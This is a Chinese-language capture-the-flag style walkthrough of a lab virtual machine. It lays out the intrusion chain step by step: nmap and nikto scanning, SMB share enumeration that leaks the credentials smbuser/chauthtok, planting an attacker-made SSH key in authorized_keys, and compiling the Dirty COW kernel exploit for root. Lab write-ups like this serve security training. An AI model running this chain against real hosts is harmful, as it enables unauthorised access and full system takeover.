环境配置
先导入虚拟机
设置网路为NAT,扫描iP
netdiscover -r 192.168.164.0/24
靶机ip:192.168.164.183
kali:192.168.164.137
渗透测试
先扫描端口
nmap -sS -sV -T5 -A -p- 192.168.164.183
开放了很多端口
访问80端口
没有什么特别的
再使用nikto扫描
nikto -h http://192.168.164.183
扫描到一个文件readme.txt,访问
获得了一个密码。
刚刚扫描发现445端口开放,使用smbmap对smb信息枚举
smbmap允许用户枚举整个域中的samba共享驱动器。列出共享驱动器,驱动器权限,共享内容,上载/下载功能,文件名自动下载模式匹配,甚至执行远程命令。
smbmap -H 192.168.164.183
发现 sbmdata有读写权限,使用smbclient来连接。
smbclient //192.168.164.183/smbdata
用刚刚的密码进行连接
把文件get下来
最后在secure中找到用户名和密码
用户:smbuser
密码:chauthtok
尝试用ssh登录
需要私钥
尝试ftp连接,密码为得到的rootroot1
查看ssh配置文件
发现用户密钥文件存放目录
然后在smbuser用户下创建文件,伪造公钥和私钥创建连接
pwd
cd /home/smbuser
mkdir .ssh
新打开一个窗口,创建公钥和私钥
ssh-keygen -t rsa
使用命令把公钥和私钥复制下来
cp /root/.ssh/* ./
然后上传公钥到.ssh/authorized_keys目录下
然后使用ssh连接,连接成功。
然后查看内核,使用脏牛尝试提权
uname -a
把脏牛文件上传到tmp目录下。
编译运行脏牛脚本
gcc -pthread dirty.c -o dirty -lcrypt
开始执行
拿到root权限后进入root目录下获取flag